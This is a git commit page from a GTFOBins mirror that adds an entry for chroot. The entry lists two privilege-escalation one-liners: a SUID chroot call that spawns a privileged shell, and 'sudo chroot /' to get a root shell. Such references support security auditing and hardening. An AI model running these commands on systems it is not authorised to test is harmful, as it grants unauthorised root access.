1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 08:16:02 +02:00

Create chroot.md

This commit is contained in:
bcoles 2020-03-15 17:46:49 +11:00 committed by Andrea Cardaci
parent 8b41830d0b
commit d27860b2df

9
_gtfobins/chroot.md Normal file
View File

@ -0,0 +1,9 @@
---
functions:
suid:
- code: |
./chroot / /bin/sh -p
sudo:
- code: |
sudo chroot /
---